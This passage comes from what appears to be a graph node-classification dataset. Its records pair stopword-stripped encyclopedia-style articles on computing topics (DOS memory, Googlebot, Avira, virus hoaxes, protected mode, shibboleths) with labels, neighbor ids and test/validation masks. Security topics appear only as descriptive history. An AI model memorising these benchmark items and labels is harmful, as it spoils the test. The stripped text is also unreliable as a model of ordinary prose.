sequence essentially working progressively layers osi model basic yet effective method used optimize conventional memory load himem.sys device thereafter loading emm386.exe device ram auto option allows access uma loading device drivers devicehigh method effectively loads fundamental memory managers conventional memory thereafter everything else uma conventional memory glutton programs mscdex could also loaded uma similar fashion hence freeing large amount conventional memory increasing popularity windows 3.0 made necessity upper memory area less relevant windows applications directly affected dos base memory limits dos programs running windows windows acting multitasking manager still thus constrained release windows 95 became less relevant still version windows provides much functionality dos device drivers dos applications running windows cd network sound support memory map win95 dos boxes automatically optimised however dos programs could execute environment specifically programs tried directly switch real mode protected mode would work allowed virtual 8086 mode running point addressed x86 virtualization technologies intel vt-x vanderpool amd-v pacifica also programs tried making switch using virtual control program interface vcpi api introduced allow dos programs needed protected mode enter virtual 8086 mode set memory manager described n't work windows 95 dos protected mode interface dpmi api switching protected mode supported upper memory blocks created mapping extended memory upper memory area running virtual x86 mode similar expanded memory emulated using extended memory method providing upper memory blocks usually provided expanded memory manager example emm386 application programming interface managing upper memory blocks specified extended memory specification many systems including modern ones possible use memory reserved shadowing expansion card rom upper memory many chipsets reserve 384 kb ram purpose since ram generally unused may used real mode upper memory custom device driver umbpci ibm xt computers possible add memory motherboard use custom address decoder prom make appear upper memory area 386-based upper memory described extra ram could used load tsr files ram disk allcard add-on memory management unit xt-class computers allowed normal memory mapped 0xa0000-effff address range giving 952 kb dos programs programs lotus 1-2-3 accessed video memory directly needed patched handle memory layout therefore 640 kb barrier removed cost software compatibility usage upper memory area different using upper memory blocks used free conventional memory moving device drivers tsrs upper 384 kb 1 mb address space left amount addressable memory 640 kb intact",
    "neighbors": [
      1408,
      4870,
      6730,
      1515,
      6893,
      8301,
      9166,
      1776,
      8241,
      178,
      4695,
      5080,
      5598,
      1247
    ],
    "mask": "Test"
  },
  {
    "node_id": 1238,
    "label": 7,
    "text": "MRI_Software:mri software mri software llc provider real estate investment management software real estate owners investors operators company founded 1971 name management reports incorporated later known management reports international acquired intuit 2002 intuit real estate solutions ires 2009 private equity firm based san francisco vista equity partners acquired ires renamed company mri software 2015 mri software acquired private equity firm gi partners 2017 mri received additional strategic investment ta associates mri software headquartered solon ohio total ten offices north america company six offices emea region four apac including hong kong singapore mri software offers property management accounting software multi-family residential commercial property retail office corporate real estate applications",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 1239,
    "label": 7,
    "text": "ShareFile:sharefile sharefile secure content collaboration file sharing sync solution supports document-centric tasks workflow needs small large businesses company also offers cloud-based/on-prem storage virtual data rooms client portals sharefile owned citrix systems jesse lipson self-taught programmer built launched sharefile november 2005 raleigh north carolina lipson created sharefile several website design clients asked build password-protected area could set folders exchange business files clients felt ftp sites time insufficient saw opportunity create web-based product sharefile launched without free version outside funding focused acquiring business customers 2011 sharefile 3 million users 100 countries sharefile included inc. 500 list fastest growing private companies 2010 2011 october 2011 sharefile acquired citrix systems terms agreement sharefile offered standalone service addition software becoming integrated citrix products acquisition lipson became vice president general manager new data sharing division within citrix deal 2016 lipson corporate vice president general manager cloud services includes sharefile citrix workspace cloud new 171,000-square-foot raleigh office opened october 2014 raleigh-based citrix employees april 2015 sharefile 55,000 corporate customers 40 million users sharefile secure cloud-based platform businesses store share large files businesses able create branded password-protected areas files service software client-portal feature businesses set customize allow outside vendors clients access specific projects files sharefile features include ability send obtain e-signatures documents integration rightsignature ability send encrypted email microsoft outlook plugin online portal office 365 connection access edit documents stored sharepoint online onedrive business ability individuals migrate data personal clouds sharefile also mobile app versions sharefile allow mobile editing offline editing documents sharefile users option store data data centers citrix-managed data centers use existing file storage systems via storagezone connectors allows companies host files want stored cloud cases due regulatory concerns managers manage corporate content sharefile using remote wipe encryption passcode lock poison pill features addition companies able restrict third-party editing tools employees might try install devices audit content accessed device lost stolen response updated regulations hipaa standards citrix created sharefile cloud health care 2013 private virtual cloud designed help companies stay compliant updated hipaa standards runs aws cloud sets aside specific virtual servers host protected health information phi also 2013 sharefile began offering feature called archiving financial services help organizations financial sector comply data archiving regulations put forth u.s. securities exchange commission financial industry regulatory authority",
    "neighbors": [
      4194,
      5732,
      3941,
      7364,
      10185,
      2733,
      4623,
      5371,
      7248,
      5650,
      7891,
      7983,
      10161,
      8471,
      2267
    ],
    "mask": "Test"
  },
  {
    "node_id": 1240,
    "label": 8,
    "text": "Googlebot:googlebot googlebot web crawler software used google collects documents web build searchable index google search engine name actually used refer two different types web crawlers desktop crawler simulate desktop users mobile crawler simulate mobile user website probably crawled googlebot desktop googlebot mobile subtype googlebot identified looking user agent string request however crawler types obey product token useent token robots.txt developer selectively target either googlebot mobile googlebot desktop using robots.txt webmaster wishes restrict information site available googlebot another well-behaved spider appropriate directives robots.txt file adding meta tag codice_1 web page googlebot requests web servers identifiable user-agent string containing googlebot host address containing googlebot.com currently googlebot follows href links src links increasing evidence googlebot execute javascript parse content generated ajax calls well many theories regarding advanced googlebot ability process javascript opinions ranging minimal ability derived custom interpreters currently googlebot uses web rendering service wrs based chromium rendering engine version 74 7th may 2019 googlebot discovers pages harvesting links every page finds follows links web pages new web pages must linked known pages web order crawled indexed manually submitted webmaster problem webmasters low-bandwidth web hosting plans often noted googlebot takes enormous amount bandwidth cause websites exceed bandwidth limit taken temporarily especially troublesome mirror sites host many gigabytes data google provides search console allow website owners throttle crawl rate often googlebot crawl site depends crawl budget crawl budget estimation often website updated site crawl budget determined many incoming links frequently site updated technically googlebot development team crawling indexing team uses several defined terms internally takes crawl budget stands announced may 2019 googlebot runs latest chromium rendering engine googlebot regularly update rendering engine stay date new version googlebot supports 1000+ features compared previous version important cited official google documentation",
    "neighbors": [
      4096,
      2566,
      8719,
      3600,
      7700,
      11284,
      9244,
      10284,
      3633,
      8769,
      4683,
      11343,
      3664,
      8285,
      2658,
      113,
      8821,
      119,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      3744,
      7841,
      1203,
      7359,
      196,
      3269,
      3782,
      714,
      10445,
      3795,
      8413,
      9949,
      6367,
      225,
      236,
      9970,
      7926,
      3836,
      5892,
      8455,
      1802,
      2318,
      10009,
      10525,
      798,
      288,
      3875,
      4901,
      5431,
      2875,
      10045,
      11590,
      11592,
      9039,
      3409,
      5483,
      4473,
      1913,
      7548,
      1409,
      4995,
      9610,
      5522,
      1427,
      5524,
      10645,
      2459,
      1435,
      2978,
      1959,
      3499,
      7595,
      944,
      4044,
      4048,
      6632,
      5100,
      9712
    ],
    "mask": "Test"
  },
  {
    "node_id": 1241,
    "label": 3,
    "text": "Dragonworld_(video_game):dragonworld video game dragonworld interactive fiction computer game graphics game published telarium formerly known trillium subsidiary spinnaker software year 1984 game based novel written 1979 byron preiss michael reaves text game written j. brynne stephens german reviewer recognized detailed graphics atmospheric fantasy prose text parser graphics storyline got score sehr gut good",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1242,
    "label": 4,
    "text": "Avira:avira avira operations gmbh co. kg german multinational computer security software company mainly known antivirus software avira internet security avira founded 2006 anti virus application active development since 1986 predecessor company h+bedv datentechnik gmbh 2012 avira software estimated 100 million customers june 2012 avira ranked sixth antivirus market share report opswat avira headquarters located near lake constance tettnang germany company additional offices usa china romania netherlands company supports auerbach stiftung foundation created company founder tjark auerbach promotes charitable social projects arts culture science avira periodically cleans virus definition files replacing specific signatures generic ones general increase performance scanning speed 15mb database clean-out made 27 october 2008 causing problems users free edition large size avira slow free edition servers avira responded reducing size individual update files delivering less data update nowadays 32 smaller definition files updated regularly order avoid peaks download updates avira products contain heuristics proactively uncover unknown malware special virus signature combat damaging element created virus guard update sent heuristic virus detection involves extensive analysis investigation affected codes functions typical malware code scanned exhibits characteristic features reported suspicious although necessarily malware user decides whether act ignore warning proactiv component uses rule sets developed avira malware research center identify suspicious behavior rule sets supplied avira databases proactiv sends information suspicious programs avira databases logging avira removed firewall technology 2014 onwards protection supplied instead windows firewall windows 7 windows 8 later microsoft certification program forces developers use interfaces introduced windows vista avira protection cloud apc first introduced version 2013 uses information available via internet cloud computing improve detection affect system performance less technology implemented paid 2013 products apc initially used manual quick system scan later extended real-time protection improved avira score av-comparatives report september 2013 avira offers antivirus engine form software development kit implement complementary products strategic technology partners avira include canonical cyan networks ibm intelligence ag microsoft novell opswat synergy systems others 4 september 2014 avira announced partnership dropbox combine avira security dropbox sync share capabilities avira offers following security products tools microsoft windows avira offers following security applications mobile devices running android ios avira prime compatible windows osx ios android operating systems related devices available consumers 5- 25-device editions dubbed avira prime avira prime unlimited respectively subscriptions 30-day 1-year increments avira formerly offered free antivirus software unix linux discontinued 2013 although updates supplied june 2016 2005 avira hit ace archive buffer overflow vulnerability remote attacker could exploited vulnerability crafting ace archive delivering via malicious web page e-mail buffer overflow could occur avira scanned malicious archive would allowed attacker execute arbitrary code affected system 2010 avira management console hit use-after-free remote code execution vulnerability vulnerability allowed remote attackers execute arbitrary code vulnerable installations avira management console authentication required exploit vulnerability 2013 avira engines hit 0-day vulnerability allowed attackers get access customer pc bug found avipbb.sys driver file allowed privilege escalation january 2008 anti-malware test lab gave avira gold status proactive virus detection detection/removal rootkits av-comparatives awarded avira av product year award summary report 2008 april 2009 pc pro awarded avira premium security suite 9 maximum six stars place a-list internet security software august 2009 avira performed 98.9 percent overall malware detection rate fastest on-demand scans on-access scans conducted pc world magazine ranked first website avira among first companies receive oesis ok gold certification indicating antispyware antivirus components several security products achieved maximum compatibility score widespread network technologies ssl/tls vpn network access control companies including juniper networks cisco systems sonicwall february 2010 testing firm av-test avira tied first place another german company malware demand detection test earned 99 score adware/spyware demand test av-comparatives gave avira silver award 99.5 detection rate summary report 2010 2012 av-comparatives awarded avira gold status 99.6 performance on-demand malware detection category classified avira top rated product overall year av-comparatives august 2014 real-world protection test 669 total test cases tried various security products avira tied first place avira also received numerous vb100 awards av-comparatives awarded avira av product year award summary report 2016",
    "neighbors": [
      2049,
      9732,
      6683,
      1052,
      550,
      2601,
      6699,
      4659,
      9791,
      10308,
      7251,
      2654,
      9832,
      5749,
      10872,
      9341,
      1150,
      127,
      7809,
      131,
      5261,
      6797,
      2193,
      156,
      2721,
      2213,
      6823,
      3243,
      6834,
      704,
      7362,
      202,
      7886,
      6382,
      5891,
      9488,
      4374,
      4889,
      6431,
      5924,
      1318,
      2859,
      3885,
      8493,
      7983,
      4403,
      9523,
      823,
      9537,
      4421,
      1355,
      10574,
      6993,
      8024,
      2907,
      9055,
      9569,
      11622,
      3944,
      4464,
      5490,
      3955,
      5492,
      2425,
      4994,
      1417,
      6539,
      3981,
      10637,
      11166,
      9121,
      1954,
      422,
      8614,
      8615,
      10166,
      7103,
      1474,
      1994,
      5069,
      10708,
      2005,
      11225,
      8668,
      9713,
      6643
    ],
    "mask": "None"
  },
  {
    "node_id": 1243,
    "label": 5,
    "text": "Asynchronous_Layered_Coding:asynchronous layered coding asynchronous layered coding alc internet protocol content delivery reliable massively scalable multiple-rate congestion-controlled manner specified rfc 5775 ietf proposed standard protocol specifically designed provide massive scalability using ip multicast underlying network service massive scalability context means number concurrent receivers object potentially millions aggregate size objects delivered session ranges hundreds kilobytes hundreds gigabytes receiver initiate reception object asynchronously reception rate receiver session maximum fair bandwidth available receiver sender supported using single sender alc focused reliable content delivery goal deliver objects quickly possible receiver time remaining network friendly competing traffic thus congestion control used conjunction alc strive maximize use available bandwidth receivers sender time backing aggressively face competing traffic sender side alc consists generating packets based objects delivered within session sending appropriately formatted packets appropriate rates channels associated session receiver side alc consists joining appropriate channels associated session performing congestion control adjusting set joined channels associated session response detected congestion using packets reliably reconstruct objects information flow alc session form data packets sent single sender channels receivers join receive data alc specify session description needed receivers join session mechanisms receivers obtain required information outside scope alc application uses alc may require receivers report statistics reception experience back sender mechanisms receivers report back statistics outside scope alc general alc designed minimal protocol instantiation provides reliable content delivery without unnecessary limitations scalability basic protocol",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 1244,
    "label": 9,
    "text": "SMX_(computer_language):smx computer language smx server macro expansion macro processing language designed embed macros web pages originally shipped popular internet factory commerce builder software ported apache module smx designed embed macros html/xml pages originally shipped internet factory commerce builder software relatively popular web server early days internet due ease developer could produce e-commerce website rather re-implement websites popular languages like perl php small group smx fans decided re-implement language apache module good example macro embeds simple incremental counter html page include results sql query page simply type middle xhtml page owing high-level nature language smx greatly reduce programming effort required build dynamic database-driven web sites unlike many programming languages smx syntax simple consistent functions begin sign followed name function followed either single sign parenthetical list arguments arguments quoted using double-quotes backslashes used escape commas double-quotes single quote beginning argument turns interpretation code argument similar lisp everything code default output change behavior use nil null macros hello world code example using variables create output",
    "neighbors": [
      865,
      8644,
      6502,
      8582,
      10506,
      10413,
      6430
    ],
    "mask": "None"
  },
  {
    "node_id": 1245,
    "label": 4,
    "text": "Virus_hoax:virus hoax computer virus hoax message warning recipients non-existent computer virus threat message usually chain e-mail tells recipients forward everyone know hoaxes sensational nature easily identified fact indicate virus nearly impossible things like blow recipient computer set fire less sensationally delete everything user computer often include fake announcements claimed originate reputable computer organizations together mainstream news media bogus sources quoted order give hoax credibility typically warnings use emotive language stress urgent nature threat encourage readers forward message people soon possible virus hoaxes usually harmless accomplish nothing annoying people identify hoax waste time people forward message nevertheless number hoaxes warned users vital system files viruses encourage user delete file possibly damaging system examples type include jdbgmgr.exe virus hoax sulfnbk.exe hoax consider virus hoaxes chain e-mails computer worm replicate social engineering—exploiting users concern ignorance disinclination investigate acting hoaxes distinct computer pranks harmless programs perform unwanted annoying actions computer randomly moving mouse turning screen display upside etc anti-virus specialists agree recipients delete virus hoaxes receive instead forwarding mcafee says f-secure recommends telephone scam operated call centres based kolkata india active since 2008 victim quoted name address told 'm calling microsoft entity sounds like connected microsoft windows service center windows technical department 've report internet service provider serious virus problems windows computer victim directed open windows event viewer displays apparently critical warnings directed website download application allow scammer control computer remotely caller supposedly fixes problems demands fee service addition fraudulent fee process usually enables malware uploaded victim computer virus hoax become part culture twenty-first century gullibility novice computer users convinced delete files basis hoaxes parodied several popular jokes songs one parody weird al yankovic song virus alert album straight outta lynwood song makes fun exaggerated claims made virus hoaxes legally changing name opening rift time space another parody virus hoaxes honor system virus circulated name amish computer virus manual virus blond computer virus irish computer virus syrian computer virus norwegian computer virus albanian virus newfie virus unix computer virus mac os 9 virus discount virus many others joke email claims authored amish similar low-technology populations computers programming skills electricity create viruses thus ask delete hard drive contents manually forwarding message friends tuxissa virus another parody virus hoax based concept melissa virus aim installing linux victim computer without owner permission story says spread via e-mail contained message titled important message windows security supposed first spread virus computers download stripped-down version slackware uncompress onto hard disk windows registry finally deleted boot options changed virus removes reboots computer end user facing linux login prompt windows security problems solved",
    "neighbors": [
      704,
      9537,
      9569,
      612,
      2213,
      7739,
      10149,
      6797,
      7515,
      5492,
      2041,
      3867,
      3167
    ],
    "mask": "None"
  },
  {
    "node_id": 1246,
    "label": 5,
    "text": "Cisco_HDLC:cisco hdlc cisco hdlc chdlc extension high-level data link control hdlc network protocol created cisco systems inc. hdlc bit-oriented synchronous data link layer protocol originally developed international organization standardization iso often described proprietary extension details chdlc widely distributed protocol implemented many network equipment vendors chdlc extends hdlc multi-protocol support cisco hdlc frames uses alternative framing structure standard iso hdlc support multiple protocols encapsulation chdlc frames contain field identifying network protocol following table describes structure chdlc frame wire serial line address resolution protocol slarp frame designated specific chdlc protocol code field value 0x8035 three types slarp frame defined address requests 0x00 address replies 0x01 keep-alive frames 0x02 following table shows structure slarp chdlc address request–response frame following table shows structure slarp chdlc keep-alive frame",
    "neighbors": [
      5472,
      8432,
      7865,
      5437,
      5118,
      4543
    ],
    "mask": "None"
  },
  {
    "node_id": 1247,
    "label": 9,
    "text": "Protected_mode:protected mode computing protected mode also called protected virtual address mode operational mode x86-compatible central processing units cpus allows system software use features virtual memory paging safe multi-tasking designed increase operating system control application software processor supports x86 protected mode powered begins executing instructions real mode order maintain backward compatibility earlier x86 processors protected mode may entered system software sets one descriptor table enables protection enable pe bit control register 0 cr0 protected mode first added x86 architecture 1982 release intel 80286 286 processor later extended release 80386 386 1985 due enhancements added protected mode become widely adopted become foundation subsequent enhancements x86 architecture although many enhancements added instructions new registers also brought benefits real mode intel 8086 predecessor 286 originally designed 20-bit address bus memory allowed processor access 2 bytes memory equivalent 1 megabyte time 1 megabyte considered relatively large amount memory designers ibm personal computer reserved first 640 kilobytes use applications operating system remaining 384 kilobytes bios basic input/output system memory add-on devices cost memory decreased memory use increased 1 mb limitation became significant problem intel intended solve limitation along others release 286 initial protected mode released 286 widely used example used microsoft xenix around 1984 coherent minix several shortcomings inability access bios dos calls due inability switch back real mode without resetting processor prevented widespread usage acceptance additionally hampered fact 286 allowed memory access 16 bit segments via four segment registers meaning 4*2 bytes equivalent 256 kilobytes could accessed time changing segment register protected mode caused 6-byte segment descriptor loaded cpu memory segment register load instruction took many tens processor cycles making much slower 8086 therefore strategy computing segment addresses on-the-fly order access data structures larger 128 kilobytes combined size two data segments became impractical even programmers mastered 8086/8088 286 maintained backwards compatibility precursor 8086 initially entering real mode power real mode functioned virtually identically 8086 allowing vast majority existing 8086 software run unmodified newer 286 real mode also served basic mode protected mode could set solving sort chicken-and-egg problem access extended functionality 286 operating system would set tables memory controlled memory access protected mode set addresses tables special registers processor set processor protected mode enabled 24 bit addressing allowed processor access 2 bytes memory equivalent 16 megabytes release 386 1985 many issues preventing widespread adoption previous protected mode addressed 386 released address bus size 32 bits allows 2 bytes memory accessing equivalent 4 gigabytes segment sizes also increased 32 bits meaning full address space 4 gigabytes could accessed without need switch multiple segments addition increased size address bus segment registers many new features added intention increasing operational security stability protected mode used virtually modern operating systems run x86 architecture microsoft windows linux many others furthermore learning failures 286 protected mode satisfy needs multiuser dos intel added separate virtual 8086 mode allowed multiple virtualized 8086 processors emulated 386 hardware support required virtualizing protected mode however wait another 20 years release 386 following additional features added protected mode release 386 protected mode offer direct method switch back real mode protected mode entered ibm devised workaround implemented ibm involved resetting cpu via keyboard controller saving system registers stack pointer often interrupt mask real-time clock chip ram allowed bios restore cpu similar state begin executing code reset later triple fault used reset 286 cpu lot faster cleaner keyboard controller method depend ibm at-compatible hardware work 80286 cpu system enter protected mode global descriptor table gdt must first created minimum three entries null descriptor code segment descriptor data segment descriptor ibm-compatible machine a20 line 21st address line also must enabled allow use address lines cpu access beyond 1 megabyte memory first 20 allowed used power-up guarantee compatibility older software written intel 8088-based ibm pc pc/xt models performing two steps pe bit must set cr0 register far jump must made clear prefetch input queue release 386 protected mode could exited loading segment registers real mode values disabling a20 line clearing pe bit cr0 register without need perform initial setup steps required 286 protected mode number features designed enhance operating system control application software order increase security system stability additions allow operating system function way would significantly difficult even impossible without proper hardware support protected mode four privilege levels rings numbered 0 3 ring 0 privileged 3 least use rings allows system software restrict tasks accessing data call gates executing privileged instructions environments operating system device drivers run ring 0 applications run ring 3 according intel 80286 programmer reference manual part binary compatibility real-mode code ability access 16 mb physical memory 1 gb virtual memory apparent changes application programmers without limitations application utilized relied techniques would n't run reality almost dos application programs violated rules due limitations virtual 8086 mode introduced 386 despite potential setbacks windows 3.0 successors take advantage binary compatibility real mode run many windows 2.x windows 2.0 windows 2.1x applications run real mode windows 2.x protected mode release 386 protected mode offers intel manuals call virtual 8086 mode virtual 8086 mode designed allow code previously written 8086 run unmodified concurrently tasks without compromising security system stability virtual 8086 mode however completely backwards compatible programs programs require segment manipulation privileged instructions direct hardware access use self-modifying code generate exception must served operating system addition applications running virtual 8086 mode generate trap use instructions involve input/output i/o negatively impact performance due limitations programs originally designed run 8086 run virtual 8086 mode result system software forced either compromise system security backwards compatibility dealing legacy software example compromise seen release windows nt dropped backwards compatibility ill-behaved dos applications real mode logical address points directly physical memory location every logical address consists two 16 bit parts segment part logical address contains base address segment granularity 16 bytes i.e segment may start physical address 0 16 32 ... 2-16 offset part logical address contains offset inside segment i.e physical address calculated codice_1 address line a20 enabled respectively segment_part × 16 offset mod 2 a20 every segment size 2 bytes protected mode replaced 16-bit selector 13 upper bits bit 3 bit 15 contain index entry inside descriptor table next bit bit 2 specifies whether operation used gdt ldt lowest two bits bit 1 bit 0 selector combined define privilege request values 0 3 represent highest lowest privilege respectively means byte offset descriptors descriptor table 16-bit selector provided lower three bits zeroed descriptor table entry defines real linear address segment limit value segment size attribute bits flags segment address inside descriptor table entry length 24 bits every byte physical memory defined bound segment limit value inside descriptor table entry length 16 bits segment length 1 byte 2 byte calculated linear address equals physical memory address segment address inside descriptor table entry expanded 32 bits every byte physical memory defined bound segment limit value inside descriptor table entry expanded 20 bits completed granularity flag g-bit short 386 processor also uses 32 bit values address offset maintaining compatibility 286 protected mode new default flag d-bit short added d-bit code segment 0 commands inside segment interpreted 16-bit commands default 1 interpreted 32-bit commands addition adding virtual 8086 mode 386 also added paging protected mode paging system software restrict control task access pages sections memory many operating systems paging used create independent virtual address space task preventing one task manipulating memory another paging also allows pages moved primary storage onto slower larger secondary storage hard disk drive allows memory used physically available primary storage x86 architecture allows control pages two arrays page directories page tables originally page directory size one page four kilobytes contained 1,024 page directory entries pde although subsequent enhancements x86 architecture added ability use larger page sizes pde contained pointer page table page table also originally four kilobytes size contained 1,024 page table entries pte pte contained pointer actual page physical address used four-kilobyte pages used given time one page directory may active use use rings privileged call gates task state segment tss introduced 286 preemptive multitasking made possible x86 architecture tss allows general-purpose registers segment selector fields stacks modified without affecting another task tss also allows task privilege level i/o port permissions independent another task many operating systems full features tss used commonly due portability concerns due performance issues created hardware task switches result many operating systems use hardware software create multitasking system operating systems like os/2 1.x try switch processor protected real modes slow unsafe real mode program easily crash computer os/2 1.x defines restrictive programming rules allowing family api bound program run either real protected mode early unix operating systems os/2 1.x windows used mode windows 3.0 able run real mode programs 16-bit protected mode switching protected mode decided preserve single privilege level model used real mode windows applications dlls hook interrupts direct hardware access lasted windows 9x series windows 1.x 2.x program written properly avoids segment arithmetic run way real protected modes windows programs generally avoid segment arithmetic windows implements software virtual memory scheme moving program code data memory programs running manipulating absolute addresses dangerous programs keep handles memory blocks running starting old program windows 3.0 running protected mode triggers warning dialog suggesting either run windows real mode obtain updated version application updating well-behaved programs using mark utility memory parameter avoids dialog possible gui programs running 16-bit protected mode gui programs running real mode windows 3.1 real mode longer supported could accessed modern 32-bit operating systems virtual 8086 mode still used running applications e.g dpmi compatible dos extender programs virtual dos machines windows 3.x applications windows windows subsystem certain classes device drivers e.g changing screen-resolution using bios functionality os/2 2.0 later control 32-bit kernel however 64-bit operating systems run long mode longer use since virtual 8086 mode removed long mode",
    "neighbors": [
      10757,
      6675,
      7187,
      10776,
      25,
      541,
      4637,
      9762,
      5158,
      1068,
      7728,
      7217,
      8241,
      9784,
      10809,
      9791,
      576,
      2625,
      6730,
      10828,
      6221,
      6739,
      86,
      4695,
      602,
      4699,
      2653,
      10333,
      97,
      5220,
      2152,
      8298,
      7285,
      9335,
      2168,
      634,
      1147,
      3197,
      1150,
      2179,
      6787,
      10371,
      10883,
      6797,
      9366,
      6296,
      2201,
      6297,
      7325,
      9887,
      3248,
      6837,
      8388,
      1736,
      9932,
      5840,
      7377,
      6868,
      1237,
      7382,
      8410,
      5856,
      1253,
      7403,
      5356,
      6893,
      5871,
      1776,
      5363,
      11513,
      2811,
      3323,
      255,
      2304,
      10499,
      5380,
      1804,
      8976,
      273,
      9490,
      11539,
      4884,
      3871,
      10016,
      2345,
      814,
      7983,
      9525,
      823,
      1848,
      4409,
      7483,
      4928,
      10561,
      11075,
      4423,
      4424,
      6984,
      9547,
      2380,
      5457,
      11601,
      10590,
      8545,
      8551,
      9066,
      11634,
      5492,
      6521,
      8573,
      7039,
      389,
      394,
      3978,
      5008,
      7057,
      11667,
      8092,
      1954,
      421,
      6570,
      5035,
      5040,
      11184,
      9141,
      3512,
      6075,
      6078,
      9151,
      1474,
      6596,
      8136,
      5074,
      9171,
      5080,
      477,
      1501,
      5598,
      6118,
      1515,
      6128,
      6129,
      499,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 1248,
    "label": 3,
    "text": "Chessmaster_2000:chessmaster 2000 chessmaster 2000 computer chess game software toolworks first chessmaster series published 1986 released amiga apple ii atari 8-bit family atari st zx spectrum commodore 64 amstrad cpc msx macintosh ibm pc compatibles game chess engine written david kittinger manufacturer rated game 2000 elo uscf reality plays approximately 1550-1600 elo 1750-1800 uscf compute stated chessmaster 2000 yardstick similar programs measured favorably cited software toolworks decision give versions game sophisticated engine 1986 computer gaming world wrote ibm pc version wish could find something negative include review ca n't ... gets absolute highest recommendation noted game sophisticated defense would resign hopeless situations without forcing human finish inevitable win magazine also favorably reviewed amiga version calling graphics exceptional concluding highly recommended info gave amiga version five stars five describing definitive chess program amiga praising graphics user interface options magazine gave commodore 64 version three stars five stating almost amiga version features criticizing requirement using algebraic notation move antic found chessmaster 2000 defeated colossus chess odesta chess magazine criticized atari 8-bit version playability stating 3-d display unusable even good monitor-you ca n't tell overlapping pieces apart lack chess clock poor documentation controls bob ewald reviewed chessmaster 2000 space gamer/fantasy gamer 78 ewald commented good program learning game playing many different competitive levels ease movement replaying famous games chessmaster 2000 became first chess game top-rated game computer gaming world reader poll score 7.25 10 1988 among first members magazine hall fame honoring games rated highly time readers 1996 computer gaming world declared original chessmaster 46th-best computer game ever released",
    "neighbors": [
      11384,
      6129,
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 1249,
    "label": 4,
    "text": "Shibboleth:shibboleth shibboleth custom tradition usually choice phrasing even single word distinguishes one group people another shibboleths used throughout history many societies passwords simple ways self-identification signaling loyalty affinity maintaining traditional segregation protecting real perceived threats term originates hebrew word shibbólet literally means part plant containing grain head stalk wheat rye less commonly arguably appositely flood torrent modern use derives account hebrew bible pronunciation word used distinguish ephraimites whose dialect used differently sounding first consonant difference concerns hebrew letter shin pronounced shoe book judges chapter 12 inhabitants gilead inflicted military defeat upon invading tribe ephraim around 1370–1070 bce surviving ephraimites tried cross river jordan back home territory gileadites secured river fords stop identify kill ephraimites gileadites told suspected survivor say word shibboleth ephraimite dialect resulted pronunciation gileadites sounded like sibboleth king james bible anecdote appears thus word already current english spelling gileadites took passages jordan ephraimites ephraimites escaped said let go men gilead said unto art thou ephraimite said nay said unto say shibboleth said sibboleth could frame pronounce right took slew passages jordan fell time ephraimites forty two thousand modern american english shibboleth sociological meaning referring in-group word phrase distinguish members outsiders – even used hostile group also sometimes used broader sense mean jargon proper use identifies speakers members particular group subculture term shibboleth extended discipline semiotics describe non-linguistic elements culture diet fashion cultural values cultural touchstones shared experience also shibboleths sort example people age nation tend memories popular songs television shows events formative years one-hit wonders prove particularly distinctive much true alumni particular school veterans military service groups discussing memories common way bonding in-jokes similar type shared-experience shibboleth information technology shibboleth community-wide password enables members community access online resource without revealing individual identities origin server vouch identity individual user without giving target server identifying information hence individual user know password actually employed – generated internally origin server – betray outsiders term also used pejoratively suggesting original meaning symbol effect lost symbol serves merely identify allegiance described nothing shibboleth 1956 nobel prize-laureate economist paul samuelson applied term shibboleth works including foundations economic analysis idea means becomes end letter law takes precedence spirit samuelson admitted shibboleth imperfect term phenomenon shibboleths used different subcultures throughout world different times regional differences level expertise computer coding techniques several forms shibboleths taken legend goes guldensporenslag battle golden spurs may 1302 flemish slaughtered every frenchman could find city bruges act known brugse metten identified frenchmen based inability pronounce flemish phrase shield friend possibly friend guilds however many medieval flemish dialects contain cluster sch- either even today kortrijk dialect sk- medieval french rolled r flemish bûter brea en griene tsiis wa't dat net sizze kin gjin oprjochte fries means butter rye bread green cheese whoever say genuine frisian used frisian pier gerlofs donia frisian rebellion 1515–1523 ships whose crew could pronounce properly usually plundered soldiers could beheaded donia dutch used name seaside town scheveningen shibboleth tell germans dutch sch dutch analyzed letter digraph ch producing consonant cluster german analyzed trigraph sch pronounced sardinia 28 april celebrated sa dii de s'aciappa day pursuit capture sa die de sa sardigna sardinia day date 1794 people cagliari chased suspected officers ruling piedmontese king asked say nara cixidi sardinian ‘ chickpea ’ piedmontese could pronounce 514 officers thus identified sent back mainland october 1937 spanish word parsley perejil used shibboleth identify haitian immigrants living along border dominican republic president dominican republic rafael trujillo ordered execution people alleged 20,000 30,000 individuals murdered within days parsley massacre although recent scholarship lack evidence mass graves puts actual total closer 1,000 black july riots sri lanka 1983 many tamils massacred sinhalese youths many cases massacres took form boarding buses getting passengers pronounce words hard bas start word like baldiya – bucket executing people found difficult world war ii united states soldiers pacific theater used word shibboleth challenge unidentified persons premise japanese people often pronounce letter l r confuse rs ls oliver gramling free men fighting story world war ii 1942 author notes war japanese spies would often approach checkpoints posing american filipino military personnel shibboleth lollapalooza would used sentry first two syllables come back rorra would open fire without waiting hear remainder allied breakout normandy beachheads 1944 hand-to-hand fighting occurred throughout hedgerows thick undergrowth norman countryside british american troops told use word thunderer countersign thick foliage given number syllables leading th sound believed word would invariably mispronounced native german speakers troubles northern ireland use name derry londonderry province second-largest city often taken indication speaker political stance frequently implied simply naming location pronunciation name letter h related shibboleth catholics protestants often pronouncing letter differently australia new zealand words fish chips often used highlight difference country short-i vowel sound ɪ asking someone say phrase identify country australian english higher forward sound close happy city new zealand english lower backward sound ɘ slightly higher version comma thus new zealanders hear australians say feesh cheeps australians hear new zealanders say fush chups furtive shibboleth type shibboleth identifies individuals part group based ability pronounce one words ability recognize seemingly-innocuous phrase secret message example members alcoholics anonymous sometimes refer friend bill w. reference aa founder william griffith wilson unindoctrinated would seem like casual – off-topic – remark aa members would understand meaning similarly world war ii homosexual us sailor might call friend dorothy tongue-in-cheek acknowledgment stereotypical affinity judy garland wizard oz code effective even higher command learned phrase way gay sailors identify failed recognize origins purportedly invested great deal time effort hunting dorothy assumed actual woman somehow assisting organizing homosexual servicemen likewise homosexuals britain might use cant language polari mark twain used explicit shibboleth conceal furtive shibboleth innocents abroad told shibboleth story seemingly inept uninteresting detail initiated however wording revealed twain freemason colombian conceptual artist doris 